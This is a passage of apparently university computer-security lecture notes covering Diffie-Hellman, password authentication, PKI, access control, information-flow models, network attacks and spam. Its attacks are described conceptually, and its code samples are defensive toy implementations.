problem (given g^x mod p, find x). g, p are public, and p is a large prime.
Alice and Bob agree on public g, p with p = 2q + 1, q prime ("safe prime").

Alice: picks random a, 1 < a < p − 1, and sends g^a mod p
Bob:   picks random b, 1 < b < p − 1, and sends g^b mod p
Alice computes (g^b mod p)^a mod p = g^(ba) mod p
Bob computes   (g^a mod p)^b mod p = g^(ab) mod p

The adversary's best attack is to try to solve the discrete log problem. So Alice and Bob
now know something that nobody else knows.
In practice, use H(g^(ab) mod p) as the shared secret.
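A sketch of the exchange with a toy safe prime (real deployments use a prime of 2048 bits or more and hash the shared value, as noted above):

    import hashlib, secrets

    p = 23                             # toy safe prime: (p - 1) / 2 = 11 is prime
    g = 5

    a = secrets.randbelow(p - 3) + 2   # Alice's secret, 1 < a < p - 1
    b = secrets.randbelow(p - 3) + 2   # Bob's secret,   1 < b < p - 1

    A = pow(g, a, p)                   # Alice sends g^a mod p
    B = pow(g, b, p)                   # Bob sends g^b mod p

    assert pow(B, a, p) == pow(A, b, p)                # both compute g^(ab) mod p
    shared = hashlib.sha256(pow(B, a, p).to_bytes(32, "big")).digest()   # H(g^ab mod p)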
BUT: this works against an eavesdropper ("passive adversary", Eve) but is insecure if the
adversary can modify messages ("man in the middle", MITM, attack).
Upshot: D-H gives you a secret shared with someone.
Solution:
1. Rely on physical proximity or recognition to know who’s talking
2. Consistency check: check that A, B end up with the same value g ab or that A, B
saw the same messages.

Alice (secret a)          Mallory (secrets u, v)          Bob (secret b)

Alice sends g^a mod p and Bob sends g^b mod p, but Mallory intercepts both; Mallory
sends g^u mod p back to Alice and g^v mod p to Bob. Alice ends up sharing g^(au) mod p
with Mallory, and Bob ends up sharing g^(bv) mod p with Mallory, while each thinks
they share a secret with the other.

How?
Use digital signature (by one party, typically the server)
If Bob can verify Alice’s signature, but not the other way around, this still works (say
Alice is a well-known server).
This gives two properties at once:
• A authenticates B or vice versa
• No MITM, so A and B have a shared secret
D-H and forward secrecy:
Suppose Alice, Bob already have a shared key and want to negotiate a new key. Then
they can do a simple D-H key exchange, protected by old key, then get new key.
If the adversary doesn't know the old key, they can't tamper with the D-H messages. Even
if the adversary obtains the old key later, not knowing it in real time means Mallory
couldn't have attacked the D-H exchange and could only have been a passive adversary.
So Alice and Bob get forward secrecy at relatively low cost.
Another problem, similar to MITM:

Alice (secret a)          Mallory          Bob (secret b)

Alice sends g^a mod p and Bob sends g^b mod p, but Mallory replaces both messages with 1.
Then Alice computes 1^a mod p = 1 and Bob computes 1^b mod p = 1, so Mallory knows both
"shared secrets".

So abort if you receive a 1. Another bad value is p − 1.


Note:

(p − 1)^2 mod p = (p^2 − 2p + 1) mod p = (0 − 0 + 1) mod p = 1

Then:

(p − 1)^a mod p = 1       if a is even
                = p − 1   if a is odd

So also abort if receive p − 1.


If you chose a safe prime, 1 and p − 1 are the only bad values, and there’s a very
small chance that one of these would be sent legitimately (plus Alice and Bob may be
checking to make sure they don’t send them anyway).

Theorem 5.1. If (p − 1)/2 is prime, then 1 and p − 1 are the only bad values in D-H.
So, p is a safe prime if (p − 1)/2 is also prime.

6 Authenticating people

SHA-3
NIST started a new standardization effort (announced in 2007) to pick SHA-3;
Keccak was recently picked
• fast to implement in software, and really fast in hardware
• in practice, it will probably be implemented in software, but a brute-force search to
break it will probably be done in hardware – slight conspiracy theory that NIST
picked it so as to advantage attackers with larger resources

Authenticating: Make sure someone is who they claim to be


Three basic approaches, relying on
1. something you know (mother’s maiden name)
2. something you have (e.g. a prox card)
3. something you are (“biometrics”)

Something you know: passwords

Password threat model:


• user picks a password and remembers it
• to log in, user gives name, password
• adversary wants to log in as user
• adversary might be able to compromise server
First approach:
• server has “password database” of (name, password) pairs
• system verifies match
• Drawback: if adversary sees database, he/she can impersonate any user
Attacks (to get a user’s password):
• guessing attack
online: try to log in as user
offline: get password DB, computational search over passwords
• trick the user, or someone else who knows the password, into telling you – sur-
prisingly effective (“social engineering”)
• impersonate server, get user to “log in” to you (“spoofing”, “phishing”)

• if user wrote down password, read it
• change the password database (somehow)
• watch the user log in, see what user types (“shoulder surfing”)
• compromise the user’s device (somehow) and record actions (e.g. “key logging”)
• get user’s password from one site, and try it on another
– most users have between 3-5 passwords they reuse
Countermeasures:
• teach users not to divulge passwords (such as having a box saying “AOL will
never ask you for your password”)
• make guessing harder
– implement a time delay after password failure (e.g. 2 seconds); this will slow
down guessing attacks
– limit number of failed attempts (“velocity control”), only for online guessing
– avoid informative error message if user fails to log in (so don’t say username
was right but password wrong)
– vs. offline guessing: slow down the verification code
∗ compute Hash^n(PRF(...)) to verify the password
∗ might slow verification by a factor of 1000
• server stores hash(password) rather than password, so password database doesn’t
convey passwords
• often, iterate hash: H(H(H(H(H...(password)...)))); slows brute-force search, but
adversary can try “dictionary attack” – hash many common passwords and build
a handy retrieval data structure
• to frustrate dictionary attacks, use a "salt": for each user, generate a random
value S_u, then store (name, S_u, Hash(S_u || password)) in the password database
(a sketch follows this list)
Then an attacker would need to build a separate dictionary for each user
Note that the salt is in the password database; it is convenient to keep it secret, but
hopefully the password hashing is strong enough for this to be okay even if the salt is leaked
Note: in this model, the server doesn't store the password itself
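A sketch of the salted, iterated hashing above; hashlib.pbkdf2_hmac packages exactly this "salt plus many hash iterations" idea (the iteration count here is illustrative):

    import hashlib, secrets

    ITERATIONS = 200_000

    def enroll(password):
        salt = secrets.token_bytes(16)                 # per-user random S_u
        h = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        return salt, h                                 # store (name, S_u, h); no password kept

    def check_password(password, salt, stored_hash):
        h = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        return secrets.compare_digest(h, stored_hash)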

Guessing is a serious problem in practice: people pick lousy passwords, and attackers
get more powerful all the time by Moore’s law
Reducing guessability:
• hard to quantify guessability
• only sure way: make password random, chosen from a large space (these are
usually hard to remember)
• format rules (e.g. special character and at least one uppercase character)
• require password to be longer (probably better than format rules)
Password hygiene
• like key hygiene
• change periodically and avoid patterns (“password1”, “password2”, ...)
• expire idle sessions (walk-away problem)
• require old password to change password
What if user forgets password?
• if hashed password is stored, can only set a new one
• else, can tell them password, BUT how do you know it’s not an impostor?
• clever solution by Gmail: if all else fails, we’ll give you a new password, but you’ll
need to wait before trying to log in again. Then legitimate user may log in and
see a warning during that time
Preventing spoofing:
• multi-factor authentication: password + something else (e.g. token, app)
• Evidence-based (Bayesian) authentication: treat password entry as evidence, but
not 100% certainty
– then use as much other evidence as possible (e.g. geolocation)
– other examples: device identity, software version, behavior patterns (espe-
cially atypical behavior)
– if confidence is too low, get more evidence
• distinctive per-user display
• distinctive unspoofable action before login
Windows CTRL-ALT-DEL before every time you enter password, always taking
you to legitimate login screen

user (knows password p)                    system (picks a random challenge r)
user sends name →
                                           ← system sends r (random)
user sends PRF(p, r) →

• challenge-response protocol: (sign a challenge value)


– advantage: eavesdropper can’t replay a log-in session
– spoofer can’t impersonate the user later
• use one-time-passwords
security advantage, but logistical disadvantages: server has to serve more stuff,
might run out at an inconvenient time
• hash-chain: the user generates a random value x_0, then chains x_{i+1} = H(x_i). The
one-time passwords are x_{n−1}, x_{n−2}, . . . , x_0, used in that order, and the server
checks that each submitted password hashes to the value it currently stores (initially
x_n), then replaces the stored value. The user remembers x_0 and where in the chain
they are. (A sketch follows this list.)
• password + Diffie-Hellman: SPEKE (Simple Password Exponential Key Ex-
change)
Use D-H with public prime p; the server stores g = (Hash(password))^2 mod p
Results:
– user, server get shared secret from D-H
– a MITM attack doesn't work
– user only has to remember a password, not a key
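A sketch of the hash-chain one-time-password scheme from the list above (SHA-256 as H; the chain length is illustrative):

    import hashlib

    def H(x):
        return hashlib.sha256(x).digest()

    def make_chain(x0, n):
        chain = [x0]
        for _ in range(n):
            chain.append(H(chain[-1]))                 # x_{i+1} = H(x_i)
        return chain

    # The server initially stores x_n; the user spends x_{n-1}, x_{n-2}, ..., x_0 in order.
    def server_accepts(stored, candidate):
        return H(candidate) == stored                  # on success, store candidate as the new value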

Something you have

Typically, tamper-resistant device stores a key or some cryptographic secret.


It does crypto to prove the user has it.

Something you are

Definition. biometric
Measuring aspect of user’s body: fingerprint, iris scan, retina scan, finger length, voice
properties, facial features, hand geometry, typing patterns, gait 

Basic scheme:
• enroll user: take a few measurements, compute “exemplar”
• later, when user presents self, measure, compare to exemplar; compute “distance”
to exemplar
• if “close enough”, accept as valid user, else reject: tradeoff in threshold between
false accepts and false rejects
Drawbacks:
• hard/impossible to follow good key hygiene (can’t change aspects of user’s body)
• often requires physical presence
• spoofing attacks: make an image of the body part, fake temperature, inductance, etc.
(melted gummy bears moulded into finger shape...)
• measurement is only approximate (need to control false positives and false negatives)
• publicly observable (e.g. DNA, fingerprints)

7 SSL/TLS and Public Key Infrastructure


Note: See piazza for lecture slides
Assumptions when logging in to, say Facebook on a Firefox browser
• Firefox is behaving correctly
• HTTPS certification is working correctly
• Facebook’s url is indeed facebook.com
But you must first verify all the above properties when you download firefox
But you must first update IE...
Essentially, you need a chain of digital certificates that verify the signatures on each
subsequent certificate or the website in question.
So, who is the entity on top? Verisign

• a company in the business of verifying websites


• Firefox has decided to trust Verisign certificates by default
But this means Firefox must be working correctly, to both verify certificates and
trust Verisign!
Essentially, there is a massive tree of entities we need to trust to do anything on the
internet.

Observations on trust

Trust is not transitive.


The roots of trust are (hopefully a small number of) brands, such as Microsoft, Dell,
Mozilla, etc. Ideally, a user does not have to remember all the trustworthy brand
urls.
What’s not here:
wireless routers, the government, ISP.
Even though we don’t trust the network, a MITM attack is not possible because of
authenticated key exchange and TLS/SSL protocols. Crypto allows us to not trust the
network.

Another problem

How does Firefox know that Facebook's cert was signed by Verisign? Because Facebook
said so!
So what if Facebook provides a different cert authority?
Theory: We would only accept it if we trust the new CA
Practice: Firefox comes with a list of trusted CAs. However, if any one of them is
malicious, it can certify arbitrary malicious URLs and you are screwed.

Attacks

If there exists an adversary (let’s call it NSA, for non-specific adversary) and a rogue
CA, how might they MITM you?
1. Issue rogue certs for target sites
2. Select users to target, install MITM boxes at their ISP(s)
How are these attacks detected?
1. Browser remembers the old cert and alerts the server if "something's wrong", i.e. the
new one seems suspicious
2. Server notices lots of users logging in from the same IP (or better, the same
device fingerprint)
Because it’s easily detected, having a NSA MITM-ing seems pretty uncommon.

Public Key Infrastructure

Infrastructure to create, distribute, validate, and revoke certs.


It is comprised of a small number of roots hierarchically certifying various entities.
Clients trust these roots, and transitively follow the chain of trust from server back to a
root. The standard is X.509 (which has a full spec of thousands of pages. Really).
There are generally cross-links between root CAs in that they certify each other, so
that even if you remove root C as a trusted root CA, roots A and B might delegate to
C, meaning it is still trusted.

Certificates

Binds an entity to a public key. Signed by some issuer (CA) and contains identity of
issuer and an expiration time.
How does a server obtain a cert? The server generates a key pair and signs its
public key and ID info with its private key to prove that server holds the private key;
also provides message authentication.
The CA verifies the server’s signature using the server’s public key. Hard problem:
How do you know that it’s actually the server that’s sending the info?
The CA then signs the server's public key with the CA's key, which creates a binding. If a
client can verify the key, ID info, and the CA's signature, it's good to go.
Almost all SSL clients except browsers and key SSL libraries are broken, often in
hilarious ways.
Three hard problems
1. Naming and identity verification. How do you know that whoever is requesting
a certificate is who they say they are?
2. Anchoring. Who are the roots that are trustworthy?
3. Revocation. If something goes wrong, how can they shut off a certificate?

Naming and identity verification

Zooko’s Triangle
For any naming system, you want it to be unique, human-memorable, and decentral-
ized. Pick 2, because you can’t get all 3.

Example. Real names are not unique. Domain names are not decentralized. Onion
addresses are not human memorable. 

Two types of certs


1. Domain Validation
The standard name = DNS name (domain) way of issuing certificates. It’s usually
automated and email-based.
2. Extended Validation
You see the name of the entity behind the URL (e.g. Microsoft). Browsers show
you the name in the URL bar and/or a green lock. The browser doesn't need to
check the URL in this case.

Anchoring

Which roots should you trust? If you can issue certs, you can run MITM attacks on
certs.

Revocation

This is different from expiration (which is for normal key hygiene). It involves
1. Authenticating the revocation request
If you’re not careful, it is an easy DOS! Also can’t ask for an old key because the
entity might not have it.
Solution: Sign a revocation request every time you get a new key and “lock
away” this request. If anything happens, you can send the revocation request.
2. Keeping clients up to date
Offline model: Certificate revocation list; issue an “anti-certificate”
Online model: OCSP (online cert status protocol) is a CA’s server that can be
queried for certificate statuses in real time
Note that revocation often fails in practice. Most browsers only check for EV certs,
which can be 6 months out of date.

So what happens when a CA doesn’t respond? What should your browser do?
• Can’t just not give you access; this would mean that the entire internet is broken
when CA is down.
Sites like Facebook are probably better at keeping their site up than VeriSign. Also,
it’s an easy DOS attack to take down a CA.
Result: Browser just goes ahead if CA is down.

8 Access control
How you reason about and enforce rules about who’s allowed to do what in the system.

Secure system design = secure components + isolation + access control.

This deals with authorization (Does that person have permission?); authentication
(Who is asking?) is a separate problem, covered earlier.

Two authorization approaches:


• access control matrix/list
• capabilities

Definition. Trusted subsystem


A program, with state, that is isolated from the rest of the world, and interacts via
declared interfaces 

Access control: SUBJECT wants to do VERB on OBJECT. Okay?


Policy: a set of (S,V,O) triples that are allowed
• How to determine policy? (should)
• How to enforce policy? (is)
One data structure: the Access Control Matrix. Rows are subjects, columns are objects,
and each cell holds the set of verbs (V1, V2, ...) that subject may perform on that object.
Subjects and labels

• subject = some process


• Object is some resource (file, open network connection, window)
• often, give labels to subjects and set policy based on labels e.g. label a process
with a user id
(+) reduces matrix size
(+) easier to make policy based on labels
(–) oversimplifies? Suppose: label = userid and means program is running “for”
userid. Alice runs a program written by Bob (example: Alice uses a text editor
written by Bob to edit Alice’s secret file). What label?
– If treat as Alice: Bob’s code can send Alice’s secret data to Bob
– If treat as Bob: Alice can’t edit her secret file, can read Bob’s files
– If treat as Bob but special for this file: none of the labelling benefits
– If treat as intersection of privileges: get all the drawbacks
• Common approach in OS (e.g. Linux): setuid bit
– Bob decides whether program runs as himself or invoker
Store access control info:
• as AC matrix - note that this will be very sparse
• as “profiles” - for each user, list of what subject can do (i.e. row of AC matrix)
• as Access Control List (ACL) - for each object, list of (Verb, Subject) pairs (who
can do what to it). This is typically used because small and simple in practice.
Often, ACL are stored along with object.
Who sets policy?
• centralized (“mandatory”) - done by an authority
(+) done by a well-trained person
(+) might be required (ethical, legal, or contractual obligations)
(–) inflexible, slow
• decentralized (“discretionary”) - each object has an owner, owner set ACLs
(+) flexible
(–) every user makes security decisions (mistake-prone)
• mix - owner can choose, within limits set by centralized authority
Groups and Roles:
Group is a set of people with some logical basis; role is group with one member
Advantages:
• makes ACL smaller, easier to understand
• change in status naturally causes change in access to resources
• ACL encodes reason for access in system (i.e. why you have access)
Roles can be hidden temporarily, “wearing different hats” (useful for testing)

Traditional Unix File Access

File belong to one user, one group.

The ACL for each operation (read, write, execute) contains a subset of {user, group,
everyone}, so each operation requires 3 bits.

Every file also has a setuserid bit.


• treat as the file owner if setuid = true
• treat as the invoker if setuid = false

Capabilities

A different approach to access control: controls access without identification, like a


physical key, “the bearer has permission to do VERB on OBJECT.”
Sometimes make them revokable, but that’s a pain to do in practice
Implementation: cryptographic (a sketch appears at the end of this subsection)
1. the system has a secret key k; capability = MAC(k, verb || object)
2. public-key: one party grants permission (makes a digital signature), another party
controls access (makes sure it is handed a valid capability - verifies the signature)
Implementation: OS table
OS stores a list of your capabilities; Alice makes a system call to give Bob capabilities
for a certain file (file descriptors used to say you’ve an open file are an example)
Implementation: in a type-safe programming language (like Java), pointer to an object
is a capability

Tradeoffs:
• cryptographic
(+) totally decentralized
(–) if capability leaks, big trouble
want some kind of revocation, but hard to do
• OS table
(+) can control flow of passage of capabilities
(+) revocation is much easier
(–) centralized, adds overhead, less flexible
Logic-based authorization

Define a formal logic, with primitives for


• principals (e.g. users/groups)
• objects
• delegation
• time
To get access, submit a proof that you are authorized
Parties make statements by digitally signing them.
The system allows great complexity in policies, but only needs a simple proof-checking mechanism to make it work. However, people must also be able to write these statements, and proofs can get large.
Caveat: people don't actually use complicated access control mechanisms; they usually leave the defaults or make everything visible to the whole world.
Ideally we'd have a system that infers what the user wants from the way the user behaves (best if not visible to the user).
9 Information flow and multi-level security


Information flow: how to control propagation of information within a program or
between programs on a system where there is some confidentiality requirement.
Consider a program P (v, s, r):
• v: visible (public) input
• s: secret input
• r: random seed
Output: all visible actions of the program. Requirement: the output shouldn't "leak" s.
Does the output of P leak information about s? Define a game against adversary
guessing between two possible secrets s (similar to semantic security). To avoid leakage,
the distribution of outputs must be independent of s for all possible values of v.
Game:
• adversary chooses v, s0 , s1
• we announce P(v, s_b, r), where b ∈ {0, 1} and r are secret and random
• adversary guesses b
We say P doesn’t leak s if adversary can’t be correct with probability non-negligibly
greater than 50% (assuming a computationally-limited adversary).
How to enforce non-leakiness?
Unlike with previous properties, cannot enforce by watching P run. (Just because no
output came out doesn’t mean there wasn’t a leak - “dog that didn’t bark problem”).
We can’t prove this property by testing. It’s inherently necessary to consider what-ifs
that differ from what you actually saw.
Also, in practice requirement are more complex (more complex labels, and different
labels on different data).
Generalization:
• label information (e.g. inputs)
• put requirements on outputs
• enforce that outputs respect requirements

Lattice model

General model for information flow policy


Definition. Lattice
(S, ⊑), where S is a set of states and ⊑ is a partial order such that any a, b ∈ S have a least upper bound and a greatest lower bound.
partial order:
• reflexive: a ⊑ a
• transitive: if a ⊑ b and b ⊑ c, then a ⊑ c
• antisymmetric: if a ⊑ b and b ⊑ a, then a = b
least upper bound U of a, b:
• a ⊑ U and b ⊑ U, and for all V ∈ S, if a ⊑ V and b ⊑ V then U ⊑ V
greatest lower bound L of a, b:
• L ⊑ a and L ⊑ b, and for all V ∈ S, if V ⊑ a and V ⊑ b then V ⊑ L


Example. Lattices
1. linear chain of labels:
public ⊑ confidential
unclassified ⊑ classified ⊑ secret ⊑ top secret
2. compartments (e.g. project, client ID, job function)
state is a set of labels, ⊑ is subset inclusion
3. org chart
state is a node in the chart, ⊑ is ancestor/descendant
4. combination/cross product of lattices
state is (S1, S2); (A1, B1) ⊑ (A2, B2) iff A1 ⊑ A2 and B1 ⊑ B2


Information flow in a program

At each point in the program, every variable has a state/label (that comes from the lat-
tice we’re using). Inputs are tagged with state. Outputs are tagged with a requirement.
States are propagated when code executes.
Example: a = b+c; State(a) = LUB(State(b), State(c)) [LUB = Least Upper Bound]
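A minimal sketch of this propagation rule in Python, over the two-level lattice public ⊑ secret; the variable names and labels are illustrative.

LEVELS = {"public": 0, "secret": 1}

def lub(l1: str, l2: str) -> str:
    # the least upper bound in a linear chain is just the higher label
    return l1 if LEVELS[l1] >= LEVELS[l2] else l2

labels = {"b": "public", "c": "secret"}
# a = b + c : a's label is the LUB of the operand labels
labels["a"] = lub(labels["b"], labels["c"])
print(labels["a"])   # secret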
Before providing output, check that the state of the output value is consistent with the policy. (For example, only allowed to emit unclassified output.) Formally, ensure that label(output) ⊑ L, where L is the label the policy requires.
But this isn’t enough (only monitoring and rejecting when inconsistent with policy) –
“dog that didn’t bark”:
// State(a) = "secret"
// State(c) = State(d) = "public"
b = c;
if (a > 5) b = d;  // requires static (compile-time) analysis to get right
output b;          // says something about a, so should be labelled secret
Static analysis won’t catch all, but will catch some of the leaks.
Problem 1: conservative analysis leads to being overly cautious
Problem 2: timing might depend on values (can lead to covert channel attacks)
What if you can’t prevent a program from leaking the information it has?
Conservative assumption (contagion model): every program leaks all its inputs to all its outputs.
Bell-LaPadula model: lattice-based information flow for programs and files
• every program has a state (from lattice): what it’s allowed to access
• every file has a state: what it contains
• Rule 1: "No Read Up" - Program P can read File F only if State(F) ⊑ State(P)
• Rule 2: "No Write Down" - Program P can write File F only if State(P) ⊑ State(F)
Theorem. If State(F1) ⊑ State(F2) and the two rules are enforced, then information from F2 cannot leak into F1.
Problems:
1. exceptions (need to make explicit loopholes in system to allow)
• declassify/unprotect old data
• what about encryption (hope ”secret” ciphertext doesn’t leak plaintext)
• aggregate/“anonymized” data
• policy decision to make exception
2. usability - system can’t tell you if there are classified files in a directory you’re
trying to delete or no space on disk for you to add a file
3. outside channels - people talk to each other outside the system
This, so far, has been about confidentiality. Can we do the same thing for integrity?
• State: level of trust in integrity of information
• ensure high-integrity data doesn’t depend on low-integrity inputs (try to avoid
GIGO problem)
Biba model: (B-LP for integrity)
• Label/state: how much we trust program with respect to integrity/how important
file is
• Rule 1: “No Read Down”
• Rule 2: “No Write Up”
B-LP model and Biba model at the same time?
• if use same labels for both (high confidentiality = high integrity), then no com-
munication between levels
• if different labels, then some information flows become possible, but could result
in being much more difficult for users
• result: usually focus on confidentiality or integrity and let humans worry about
this outside of the system
Back to crypto...
Secret sharing:
• divide a secret into "shares" so that all shares are required to reconstruct the secret
– 2-way: pick a large value M; the secret is some s, 0 ≤ s < M
pick r randomly, 0 ≤ r < M
shares are r and (s − r) mod M
to reconstruct, add the shares mod M
– k-way: shares r_0, r_1, . . . , r_{k−2} random, plus (s − (r_0 + · · · + r_{k−2})) mod M
– can also use degree-(k−1) polynomials so that k values are needed to reconstruct (Shamir secret sharing)
• suppose the RSA private key is (d, N); shares (d1, N), (d2, N), (d3, N) such that d1 + d2 + d3 = d mod (p−1)(q−1)
X^d1 · X^d2 · X^d3 mod N = X^((d1+d2+d3) mod (p−1)(q−1)) mod N = X^d mod N
(splits up an RSA operation)
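A minimal sketch of additive k-way secret sharing in Python; M and the secret are illustrative toy values.

import secrets

M = 2**128

def split(s: int, k: int) -> list[int]:
    shares = [secrets.randbelow(M) for _ in range(k - 1)]
    shares.append((s - sum(shares)) % M)   # last share makes the sum equal s mod M
    return shares

def reconstruct(shares: list[int]) -> int:
    return sum(shares) % M

shares = split(42, 3)
assert reconstruct(shares) == 42
# Any k-1 of the shares are uniformly random and reveal nothing about the secret.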
10 Securing network infrastructure


The internet is a network of networks. Each network is an “autonomous system” such
as ISPs. For example, Princeton is one autonomous system. Each autonomous system
is run by a separate administrator, and they connect together at exchange points.
There are about 40,000 autonomous system numbers assigned.
Internet routing
Routing is based on BGP (border gateway protocols). BGP is how autonomous systems
talk to each other about routing information. IP is the actual routing protocol.
Shortest path routing
This is a simplified way of viewing BGPs. Think of each autonomous system as a single
node.
• routers talk to each other
• they exchange topology and cost info
• each router calculates the shortest path to destination based on its neighbors’
distances
“If my closest neighbor can get to destination in 4 steps, then I can get there in
5 steps”
BUT routers can lie about paths and costs
• router calculates the next hop based on neighboring path costs
• router forwards packet to the next hop
An adversary node can lie about its costs and route packets to itself. There might exist a tunnel for packet reinjection if Z and Z′ are both adversarial: Z can modify all packets and send them to Z′ for reinjection. This is called prefix hijacking.

Prefix Hijacking

(This often happens as a result of accidental misconfiguration).

Example. China "hijacked the internet" when it announced routes to a random-ish 15% of the internet. It is an autonomous system (AS) big enough that it didn't get crushed under the load; it simply forwarded the traffic, so users did not notice anything. 

Prefix hijacking is of limited use to a malicious attacker:

1. can't bypass app-level encryption
2. can't store all the traffic
3. it's very easily detectable

How to defend?

Can crypto help? Remember that AS’s can lie about their own links and costs and
about what other nodes said. So, crypto can prevent lying about what neighbors said
but it can’t prevent lying about your own links.
Routing relies on trust
It is a different adversary model compared to application-layer security.
• small number of AS’s
• AS’s are well known
• and physically connected
• AS’s also don’t want to advertise shorter paths than reality because then they
will likely be overloaded with traffic and go down
All of the above are natural protection against attacks. It’s not an ideal setup, but it’s
not terrible either. Is there a much better way to design BGP if we were to do it over?
Unclear.

IP packet

These contain source and destination IP addresses. Can these things be spoofed?
• source IP? yes
• destination IP? no, that doesn’t even make sense
Nodes can only verify claimed source address back one hop; this is why IPs are spoofa-
ble. For example, DoS attacks spoof their return IP addresses.

Ingress/egress filtering

(This is what takes place at the “gateway” of the AS)


Ingress filtering: discard an incoming packet if its source IP is inside the AS (because why would that happen in real life? It wouldn't). This protects against some types of DoS. Protects yourself.
Egress filtering: discard outgoing packet if source IP is outside. This protects against
types of DoS if adversary takes over internal computer and tries to send DoS packets.
Protects the rest of the internet.
DDoS is easy if you have a lot of zombies
More difficult: DoS from a single machine with more traffic than the machine is capable of generating. So the goal? Amplification of traffic volume.
Smurf attack
Attacker broadcasts an ECHO request with a spoofed source IP address (the victim's IP address). All network hosts (broadcast recipients) hear the broadcast and respond – except they respond to the victim, who is overwhelmed with traffic.

DNS attacks

DNS: the system that takes a domain name and translates it into an IP address.
User requests example.com → recursive name server → root server → (back to) recursive name server → TLD name servers → (back to) recursive name server → the domain's authoritative name servers (there are thousands) → (back to) recursive name server → the IP address (e.g. 192.168.3.1) returned to the user
Root servers
Requests are delivered to the root server who is closest and available.
Cache poisoning
In the words of Wikipedia: “DNS spoofing (or DNS cache poisoning) is a computer
hacking attack, whereby data is introduced into a Domain Name System (DNS) re-
solver’s cache, causing the name server to return an incorrect IP address, diverting
traffic to the attacker’s computer (or any other computer).”

Prevention: DNSSEC

DNS root servers: root of trust


DNS hierarchy: chain of trust; each name server signs public keys of servers it delegates
to. Resolvers and some clients have root public keys built in. This only authenticates
– no encryption.

Crypto and layers

Crypto can be incorporated into different layers:


Secure sockets layer (SSL) and transport layer security (TLS)
• Application level security (or rather, between application and transportation)
• Authenticates hostnames, encrypts sessions over TCP


• Keys verified using certs/certificate authorities
IPSec
• Network layer security
• Authenticates IP addresses, encrypts IP packets
• Keys are distributed/verified via DNS or manually
• It’s a mess because (1) key distribution sucks (2) authenticating IP addresses is
hard for user to sanity check (3) network level is hard to implement since IP is
stateless
NSA MUSCULAR
NSA was physically tapping into links between Google data centers, and between Yahoo
data centers. IPSec would have stopped this.
11 Spam
Focus on email.
Scope of problem:
• Vast majority of email is spam (99+%)
• Lots is fraudulent (or inappropriate)
• 5% of US users have bought something from a spammer
The anonymity makes this attractive for certain kinds of products
• Spamming often pays (low cost to send, so need little success to profit)
Review: how email works
• Messages written in standard format
– Headers: To, From, Date, ...
– Body: can encode different media types in body
• Traditionally:
sender's computer → (SMTP) → sender's MTA → (SMTP) → recipient's MTA → (IMAP) → recipient's computer
(MTA: Mail Transfer Agent)
• Webmail model:
sender's computer → (HTTP(S)) → sender's mail service → (SMTP) → recipient's mail service → (HTTP(S)) → recipient's computer
• More complexities:
– Forwarding
– Mailing lists
– Autoresponders

Economics of spam

It is very cheap to send email.


Most of the cost falls on recipient
• Needs to store message
• Human takes the time to actually read the message
Sender will send when sender’s cost < sender’s benefit. What we would like: send
when total cost < total benefit.
Anti-spam strategies

Laws, technology, or combination


Note that most spam is already illegal (either a fraudulent offer, false advertising, or
offering an illegal product).

Definition. Spam
1. Email the recipient doesn’t want to receive
Problems:
• Defined after the fact
• Legally problematic (anyone can say they didn’t want some message)
• Not what you want (just not wanting it doesn’t make it spam)
2. Unsolicited email
Problems:
• What does this mean? (May not explicitly have asked for a given email)
• Lots of unsolicited email is wanted
3. Unsolicited commercial email
Problems: less than in definition 2, but still the same issues


Free speech: (legal constraint, principle we’d like to honor)


• Minimum: don’t stop a communication if both parties want it
• Legally, there’s no absolute right not to hear undesired speech.
• Commercial speech gets less protection than political speech.

Definition. Spam (CAN SPAM Act)


Any commercial, non-political email is spam unless:
(a) it’s non-commercial, or
(b) it’s political speech, or
(c) recipient has explicitly consented to receive it, or
(d) sender has a continuing business relationship with recipient, or
(e) email relates to an ongoing commercial transaction between the sender and receiver
Note: this definition is not testable in software.


Vigorous enforcement against wire fraud, false medical claims, etc. (can follow the
money)
Law against forging the From address is surprisingly effective
Disadvantages for spammer:
• Forced to identify themself
• Easy to filter
Private lawsuits
• ISP sue spammer to cover their server resources, etc.
(AOL: sue spammers and give a random user their stuff!)
• Serves as a deterrent (expensive to bring lawsuit)
Laws have succeeded in drawing a line between spam and legitimate businesses.
Anti-spam technologies:
• Blacklist:
List of “known spammers”, refuse to accept mail from them
– If list holds From addresses: Spammer will spoof From address (then spam-
mer is also breaking the law)
– If list holds IP addresses: Spammers move around, compromise innocent
users’ machines and send spam from there (very common); also note that
outgoing email IP address is often shared
How aggressive should you be about putting people on the blacklist?
– Too slow: spammers can get away with spamming
– Too quick: false blocking
Denial of service: forge spam ”from” victim
• Whitelist:
List of people you know, reject email from everybody else
– Blocks too much
– But: can combine with other countermeasures (exempt certain people from
another countermeasure)
• Require payment (Pay-to-send):


– Pay in money:
Sender pays receiver
OR sender pays receiver IF receiver reports the message as spam (generates an incentive problem for the receiver)
OR sender pays charity if receiver reports as spam
Problem: really expensive for large mailing lists
– Pay in wasted computing time:
Sender must solve some difficult computational puzzle
Works internationally, but big problem for large mailing lists, destroys com-
puting time
– Pay in human attention:
CAPTCHA
Can hire solving of CAPTCHAs in various ways (sweatshops, make people
solve to see porn, ...)
– Pros and Cons
(a) raises cost of spamming (+)
(b) often raises cost of legit mail (-)
(c) often wastes resources rather than transferring them (-)
• Sender authentication
– address-based (e.g. Princeton says which IPs can send @princeton.edu From
address)
– signature by domain owner
• Content-based filtering:
Recipient applies a filter algorithm to the content of incoming email (a minimal scoring sketch appears after this list)
– Early days: keyword-based
Lots of false positives, and ways to work around these
– Now: word-based machine learning, often also personalized (relying on the user to label messages as spam or not)
Spammers could test the non-personalized part by making an account and seeing what gets marked as spam – until filters started looking for the word-salad test messages
– Collaborative filtering: use other users’ reports as indicator of spam
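A minimal sketch of word-based spam scoring in the spirit of the filters above; the per-word weights are made-up values standing in for what a learning algorithm would fit from labelled mail.

LOG_ODDS = {"viagra": 4.0, "winner": 2.5, "meeting": -1.5, "thesis": -2.0}

def spam_score(message: str) -> float:
    # sum of per-word log-odds; positive means "more likely spam"
    return sum(LOG_ODDS.get(w, 0.0) for w in message.lower().split())

def is_spam(message: str, threshold: float = 1.0) -> bool:
    return spam_score(message) > threshold

print(is_spam("You are a WINNER claim your prize"))    # True
print(is_spam("Agenda for tomorrow's thesis meeting"))  # False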


Robocalls now a huge problem: FTC gave public challenge to solving this
12 Web Security
Note: see piazza for lecture slides
Two sides of web security
1. browser side
2. web applications
• written in PHP, ASP, JSP, Ruby, etc.
• include attacks like sql injection
